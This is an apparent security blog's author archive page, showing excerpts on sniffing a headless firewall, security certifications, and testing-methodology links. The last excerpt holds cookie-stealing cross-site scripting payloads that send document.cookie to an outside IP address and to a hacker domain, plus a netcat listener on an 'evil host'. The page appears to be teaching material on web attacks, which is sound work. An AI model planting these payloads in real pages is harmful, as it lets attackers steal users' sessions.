Author Archives: fsormok

The problem You like to sniff your firewall. The problem is that the firewall is (of course) a headless linux box without a gui. After half of an hour you’ll get headache from starring at the characters fly bye the … Continue reading →

OPSA – OSSTMM Professional Security Analyst OPST – OSSTMM Professional Security Tester SSCP – Systems Security Certified Practitioner CISSP – Certified Information Systems Security Professional CEH – Certified Ethical Hacker Certificate CHFI – Computer Hacking Forensic Investigator LPT – Licensed … Continue reading →

OWASP (Open Web Application Security Project) http://www.owasp.org/ OSSTMM (Open Source Security Testing Methodology Manual) http://www.osstmm.org The NIST SP 800-42 at: http://csrc.nist.gov/publications/nistpubs/800-42/NIST-SP800-42.pdf The CISSP and SSCP Open Study Guides Web Site http://www.cccure.org The Professional Security Testers Warehouse http://www.professionalsecuritytesters.org

listener on evil host: nc -l -p 80 example script on attacked server: 1 &lt;script&gt;alert(document.cookie)&lt;/script&gt; Example 1 1 &lt;script&gt;document.write(\’&lt;img src=<a title="http://195.225.45.220/\’" href="http://195.225.45.220/%5C%27" rel="nofollow">http://195.225.45.220/\'</a> + document.cookie + \’&gt;\’)&lt;/script&gt; Example 2 1 &lt;script&gt;(new Image).src="<a title="http://195.225.45.220/c.php?c=" href="http://195.225.45.220/c.php?c=" rel="nofollow">http://195.225.45.220/c.php?c=</a>" + escape(document.cookie)&lt;/script&gt; Example 3 1 &lt;script&gt;(new Image).src='<a title="http://www.hacker.com/’" href="http://www.hacker.com/%27" … Continue reading →